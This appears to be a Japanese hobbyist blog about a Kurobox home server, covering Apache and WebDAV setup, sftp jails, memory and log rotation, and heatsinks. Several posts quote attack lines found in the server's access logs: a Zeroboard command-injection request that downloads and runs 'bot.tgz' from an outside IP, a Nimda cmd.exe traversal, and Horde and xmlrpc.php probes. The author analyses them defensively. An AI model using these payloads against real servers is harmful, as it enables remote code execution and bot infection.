玄箱のapacheログ

　玄箱でapacheを動作させてるんだが、実にアクセスログの数割がクラック目的と思われるものだ。で、ログを眺めていると見たこともないパスを発見。調べて見ると、hordeっていうPHP用のフレームワークにセキュリティホールがあるらしい。おそらく、それ目当てでhordeの存在確認を無限ループで行ってるスクリプトがどこかで動いているのだろう。

Horde -実績のあるフレームワーク-

2006-04-19
Horde にクロスサイトスクリプティングによる攻撃を受ける等の複数の問題
Horde は処理の実装が原因で複数のセキュリティホールが存在します。攻撃者にこれらのセキュリティホールを利用された場合、リモートからクロスサイトスクリプティングによる攻撃を受ける等の可能性があります。

だってさ。一応、IPつきでログをのせとく（笑）。少なくとも、ログでトライされたパスは除外しとくべきだろう。
ところで、thisdoesnotexistahaha.phpって何なんだろう？ジョークかな？

195.225.169.92 - - [27/Apr/2006:00:44:36 +0900] "GET /horde//README HTTP/1.1" 404 211
195.225.169.92 - - [27/Apr/2006:00:44:37 +0900] "GET /horde2//README HTTP/1.1" 404 212
195.225.169.92 - - [27/Apr/2006:00:44:38 +0900] "GET /horde3//README HTTP/1.1" 404 212
195.225.169.92 - - [27/Apr/2006:00:44:38 +0900] "GET /horde-3.0.9//README HTTP/1.1" 404 217
195.225.169.92 - - [27/Apr/2006:00:44:39 +0900] "GET /Horde//README HTTP/1.1" 404 211
83.16.183.194 - - [27/Apr/2006:09:55:37 +0900] "GET /thisdoesnotexistahaha.php HTTP/1.1" 404 223
83.16.183.194 - - [27/Apr/2006:09:55:38 +0900] "GET /horde/services/help/ HTTP/1.1" 404 218
83.16.183.194 - - [27/Apr/2006:09:55:39 +0900] "GET /horde-cvs/horde/services/help/ HTTP/1.1" 404 228
83.16.183.194 - - [27/Apr/2006:09:55:39 +0900] "GET /pub/horde-cvs/horde/services/help/ HTTP/1.1" 404 232

XMLRPCの脆弱性をねらったアタック

　ここ最近、WEBサーバにxmlrpc.phpの存在確認をしていると思われるログがよく残ってる。例によって、xmlrpc.phpがインストールされてそうなパスをかたっぱしから試している。

/xmlrpc.php
/blog/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blogs/xmlsrv/xmlrpc.php
/drupal/xmlrpc.php
/phpgroupware/xmlrpc.php
/wordpress/xmlrpc.php
/xmlrpc.php
/xmlrpc/xmlrpc.php
/xmlsrv/xmlrpc.php

　問題のxmlrpcなんてのは何をするのか私は知らないが、安易にスクリプトベースのサーバサービスは動かさないほうがいいかもしれん。

複数ベンダのxmlrpc.phpでリモートから任意のコードが実行可能な脆弱性が見つかる

ウイルス情報 Linux/Lupper.worm

↑を見る限り、とりあえずphpやcgiを設置するパスは直接的な命名をさけた方がよさそうだ。手動でパス等を解析されたら結局ダメなんだが、どうもあらかじめ設定してあるURLしかチェックしてない様子。

ゼロボードのセキュリティホールをついたアタック

　玄箱のWEBサーバに怪しげなログが残っていた。

211.253.183.58 - - [13/Oct/2005:14:35:44 +0900] "GET //bbs/skin/zero_vote/error.
php?dir=http://geocities.com/zamelmania/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20http:
//211.253.183.58/bot.tgz;tar%20xzvf%20bot.tgz;cd%20bot;./start HTTP/1.1" 404 227
211.253.183.58 - - [13/Oct/2005:14:35:45 +0900] "GET /board/skin/zero_vote/error
.php?dir=http://geocities.com/zamelmania/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20http
://211.253.183.58/bot.tgz;tar%20xzvf%20bot.tgz;cd%20bot;./start HTTP/1.1" 404 22
8
211.253.183.58 - - [13/Oct/2005:14:35:45 +0900] "GET /zboard/skin/zero_vote/erro
r.php?dir=http://geocities.com/zamelmania/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20htt
p://211.253.183.58/bot.tgz;tar%20xzvf%20bot.tgz;cd%20bot;./start HTTP/1.1" 404 2
29
211.253.183.58 - - [13/Oct/2005:14:35:45 +0900] "GET /zeroboard/bbs/skin/zero_vo
te/error.php?dir=http://geocities.com/zamelmania/fbi.gif?&cmd=cd%20/tmp;curl%20-
O%20http://211.253.183.58/bot.tgz;tar%20xzvf%20bot.tgz;cd%20bot;./start HTTP/1.1
" 404 236

　このゼロボードとやら、どうやら韓国産の掲示板ソフトウェアのようだ。そこで、ゼロボードがおいてありそうなパスをかたっぱしから試しているといったところか。見た感じでは、error.phpに外部から指定したコマンドを実行してしまうセキュリティホールが存在しているように思える。つまり、cmdパラメータに書かれた文字列をコマンドとして実行してしまうという極めて簡単なセキュリティホールだ…。

そのコマンドは
cd /tmp
curl -O http://211.253.183.58/bot.tgz
tar xzvf bot.tgz
cd bot
./start
といった内容で構成されている。

きっとbot.tgzに、ゾンビＰＣ化させるスクリプトか何かが入っているのだろう。
まあ、玄箱にゼロボードなんて入ってないから関係ないけど。

玄箱に富士通からアクセス？

　なんかここ数日、WEBサーバの存在確認とも思えるアクセスがある。アクセスIPを逆引きすると[組織名] InfoWeb(富士通株式会社)からのアクセス。不治痛！何こそこそ探っとるんじゃああーーー。

アクセスは、
GET / HTTP/1.0
↑これだけ。

そういえばInfoWebって、大昔のニフティだった。
もしかして同じニフティユーザが怪しいWEBサーバ立ち上げてないか（ゾンビWEBサーバとかw）調べてるんじゃあ…。何のために１時間おきに再確認してるんだ？

ハッ(ﾟдﾟ)

まさか、自宅サーバ立ち上げてるんだけど、ADSLが不安定でしょっちゅうIPアドレスが変って。その挙句、自分のウェブにアクセスしたら簡素なダミーページが表示され、パニック状態とか？よくわからないのでほっておく。

　ところで、今までWEBサーバに対する怪しいログをまとめて紹介

（１）IISのWebDAV脆弱性をつくワーム（W32.HLLW.Gaobot.gen）
　　SEARCH /\x90\x02\xb1…

（２）IISのセキュリティホールをつくウイルス（CodeRed）
　　GET /default.ida?XXXXX…

（３）IISのセキュリティホールをつくウイルス（Nimda）
　　get /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir

（４）アクセス解析ソフトAwStatsの脆弱性（最初は存在確認のみ）
　　GET //cgi/awstats.pl

（５）プロクシーとして動作するか調べてる？
　　GET http://www.online.sh.cn/ HTTP/1.1
　　GET http://www.sina.com.cn/ HTTP/1.1

（６）ニフティ会員によるWEBサーバの存在確認（笑）
　　GET / HTTP/1.0

CodeRedやNimdaに感染している奴がまだいるんだ…。

こないだニュースで、中国のハッカー集団が日本をインターネット越しに大規模攻撃する計画とのこと。

日本狙い大規模ハッカー攻撃を計画

でも、ゾンビＰＣが一番多いのは中国ですから～、残念！

同じ国民のＰＣを乗っ取って踏み台にしてるだったとしたら…。
(´д｀;）

IOデータから白箱発売

　IOデータから挑戦者ブランドで発売される予定のLANTANKこと白箱（玄箱に対抗？）が、もう秋葉で手に入るようだ。

スパニング/ミラーリング対応 ストリーミングサーバ組立キット LANTANK

玄箱と比較してメリットと思われるものは、

（１）HDD２台でミラーリングできる
（２）AVデータサーバ機能がデフォルトで装備されている
（３）iTunesとも連携できるサーバ機能付き
（４）OSがDebian GNU/Linux
（５）シリアルケーブル装備なのでシリアルコンソールから操作可能

WebDAVは役に立たないことがわかったので、デフォルトで装備されていてもあえてメリットには含めない。

素箱、いや白箱を買おうとしている人へ。HDD２つあるとうるさいよ。あと、ファンも２つだから…。標準でいろいろ連携できるソフトウェアがインストールされるみたいなので、中身をいじらない人にはお勧めかもしれない。

追記
------------------
ミラーリングの他にストライピングもできるみたいなので、HDD2つで容量半分なのが気に食わなくて結局ストライピングにする予感。あと、最近のHDDはとても静かなので2つでもうるさすぎるということはないと思うが、問題は熱。7200回転のは結構熱い！！あと、ファンがうるさいと思う（2つあるし)。HDDって、温度が45度越えたあたりから故障率が跳ね上がるみたいなので、定期的にバックアップして、バックアップHDDは電源入れないで保管がいいかもしれない。

玄箱でsftp

下の「玄箱でWebDAV」からの続きです

---

　sshにはファイル転送コマンドsftpがある。これを使うとセキュアにファイル転送することができる。ただし、この方法だとsshでログインできてしまうばかりか、sftp経由でもルートディレクトリ以下をすべて覗けてしまう。適切なパーミッションを設定しておけばいいのだが、家の中をうろうろされてるような感じで気分が悪い。

　そこでssh,sftp経由でアクセスしてきたユーザを特定のディレクトリに閉じ込めるためjailをインストールすることにした。

インストールと設定は以下のURLを参照
STRAY PENGUIN -Linux Memo-

何点か補足すると、

http://www.jmcresearch.com/projects/jail/
から、1.9aをダウンロード（右上にあるDownloadってやつ。わかりにくい）

Makefileを編集
INSTALL_DIR = /usr/local
COPT = -Wall -O2
(他にも必要があれば編集)

/home/jailsを監獄とすると、以下のファイルをコピー

cp /etc/profile /home/jails/etc
cp /etc/timezone /home/jails/etc
cp /usr/share/zoneinfo/Asia/Tokyo /home/jails/etc

　なぜかaddjailswがバイナリをコピーしてくれないので以下のファイルを手動で/home/jaisにコピー

/bin/*
/lib/*
/usr/bin/{ssh,scp,sftp}
/usr/lib/*
/usr/libexec/sftp-server

　サーバの情報を取得・操作するようなコマンドはコピーしないほうがいいと思われる。（例：ps,df,kill,mountなどなど）よく検討すること。

確認事項
　sshログインしてみて、/home/jails以下がルートディレクトリになっていることを確認。余計なコマンドがないかも確認。WinSCPしてファイル送受信できることを確認。

WinSCPはhttp://www.tab2.jp/~winscp/から、
sshクライアントのPuttyjpはhttp://hp.vector.co.jp/authors/VA024651/から持ってくること。

　WebDAVと違って、操作・ファイル転送が快適、転送ミスもないので言うことなし。アカウント別にパーミッションが効いているのでなおよし。

玄箱でWebDAV

　Apache2 + mod_dav + opensslの組み合わせで、玄箱をWebDAVサーバ化してみた。オリジナル玄箱でビルドを簡単に行うことができたので、ビルドの詳細は省略する（チラシに書いたことをやっておかないとダメなのかもしれんが）。設定方法についても、他のホームページで解説しているのでここでは述べない。

　運用を開始し、友人を被験者扱いにして動作検証を行った。すると問題点がちらほら…。

問題点

(1) 日本語(SJIS)をうまく処理するようにできなかった（努力不足です）
　単に設定がまずいだけなのだが、apache1と2で設定が微妙に違うのと文字コード変換が正規モジュールでないといった理由で、（めんどくさいので）友人にはアルファベットのみの使用を強制。mod_encodingについては以下を参照(WebDAV Resources JP)。当然、SJISの外字がうまく処理できないなどの問題もあるようだ。

(2) 動作が遅い
　WebDAVはHTTP拡張プロトコルで成り立っているからか、妙に動作が遅い。IEのWebフォルダがクソなだけかもしれんが、Windowsの良いWebDAVクライアントがないので比較のしようがない。（作れってか？）

(3) Windows2000上のIEだとファイルの日付情報が取得できない
　友人曰く、「ファイルの日付が江戸時代、24世紀、172世紀とかになるよ？」とのこと。XPだと日付情報が取得できるのだが、WebDAVの仕様からして日付は取得できないとの事。Win2000の方が正しい実装ということか？

(4) Windows2000上だとファイル取得したときサイズが０のときがある
　取得ファイルの約半分がサイズ０だったとのことなので、最初は友人のマシン(windows)を疑った。それはそれで怪しかったのだが、正常マシンでも数十個に１つはサイズ０になる。ログを見ると、正常に取得できているはずのファイルもダメだったりするのでサーバ側の問題でもないのかもしれない（エラーログはいているときはサーバの問題）。これもXPだと問題がないので、Win2000ユーザを移行させるために仕組んだゲイツの嫌がらせなのかもしれん。IEのキャッシュサイズを小さくしすぎていると、同じ問題が発生するとの記述がどこかにあったが、キャッシュサイズを増やしても完全には解決しない様子。

(5) ユーザ別にアクセスさせることができない
　これはWebDAVの仕様とのこと。ファイルの読み書きはすべてapacheを動かしているユーザ権限になってしまう。例えば、apacheをユーザ名apacheとかで動作させてると、書き込んだファイルのオーナーはすべてapacheになってしまう。IPA支援プロジェクトでユーザの役割に注目したアクセス制御機能を提供するアクセス管理サーバというのがあるみたいだが、どのくらい使えるのか試してないので全く不明。動作環境みると、色々必要（めんどくさい）みたいじゃね。

結論

￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣｣
―――――――――――――‐┬┘
　　　　　　　　　　　　　　　　　 　 　.|
　　 　 　 ＿＿＿＿.＿＿＿＿ 　　 |
　　　　　|　 　 　 　 | 　 　 　 　|　　 |
　　　　　|　 　 　 　 | ∧＿∧　|　　 |
　　　　　|　 　 　 　 |（; ´д｀）つ ミ |
　　　　　|　 　 　 　 |/ ⊃　 ﾉ　|　　 |　　WebDAV
　 　 　 　￣￣￣￣'￣￣￣￣　 　 | 　

追記
-------------
ssh(sftp) + jailに移行することにした。

玄箱の空きメモリとapache2

　玄箱にapache2をインストールして常時稼動している。apache2から、プロセス単位で複数同時アクセスをさばくモデルの他に、スレッドで複数のアクセスを処理する機能が追加されている（workerやらprechildと呼ばれているやつ）。

　しかし、workerとprechildを試した結果、玄箱だとスレッドモデルの動作が怪しいので従来のプロセス単位(prefork)で動作させることにした。多分、glibcあたりが古いからだと推測するのだが、新しいglibcはgccのバージョンが3以上必要となるのでしばらく放置。

　プロセスモデルでapacheを動作させると、当然複数のapacheが起動している。玄箱HGの場合、物理メモリは128Mあるので、空きメモリには余裕があるはず。空きメモリを確認するコマンド free を実行してみると・・

	total	used	free	shared	buffers	cached
Mem:	127088	110844	16244	0	16604	77664
-/+ buffers/cache:		16576	110512
Swap:	257032	2744	254288

とか表示されて、一瞬「空きメモリが16Mしかないよ」と思ってしまう。

　ところが、最近は空きメモリを積極的にバッファやキャッシュに割り当てて有効利用する仕組みになっているらしく、free + buffers + cachedが実質の空きということらしい。なるほど、なんでswap領域に退避されるサイズがいつも小さいのかと思っていたら、そうゆうことだったのか。

　というわけで、空きメモリにはまだまだ余裕があるということになる。apacheと同時にtomcatを動かそうとしているのだけども、さすがに玄箱でjavaはクソ重い。更に、最終的にapache+tomcat+何かのDB の組み合わせを計画しているのだが、まともに動いてくれるのか心配でならん。

玄箱のlogrotate

今まで24時間稼動させてなかったので気づかなかったが、玄箱のlogrotateは1日で回転してバックアップを1日分しか残さない・・・。（ログの意味ないじゃねーか）

/etc/logrotate.confを編集

dailyをmonthlyに変更。
rotate 1をrotate 12に変更。

これで月単位でログローテートして12ヶ月分保存されるはずだ。（多分・・）

玄箱にヒートシンク

以前、基盤をぶちまけたまま動作させていたが、CPUが結構な熱さになっていた。PowerPCなので少し熱を持つ程度かと思っていたが、ファンによる空気の循環がないとこうまで熱くなるのか、それとも箱の中でも熱くなっているのかわからない。

どこかのホームページでヒートシンクをつけている人を見たことがあるので、秋葉原の千石でヒートシンクを買ってきた。

左がCPUに装着する予定のヒートシンク。CPU用ではないが、これで十分だろう。CPUの上にはハードディスクがあるので、そんなに背の高いヒートシンクはつけられない。

これがヒートシンクをCPUに装着した図。直接風があたるわけではないので、気休め程度かもしれない。

イーサネットのチップ（蟹）にもヒートシンクつけてみた。100BASE-TXで動作させているためか、熱くならないようだ。ギガビットだと熱を持つのかもしれないが環境がないのでわからない。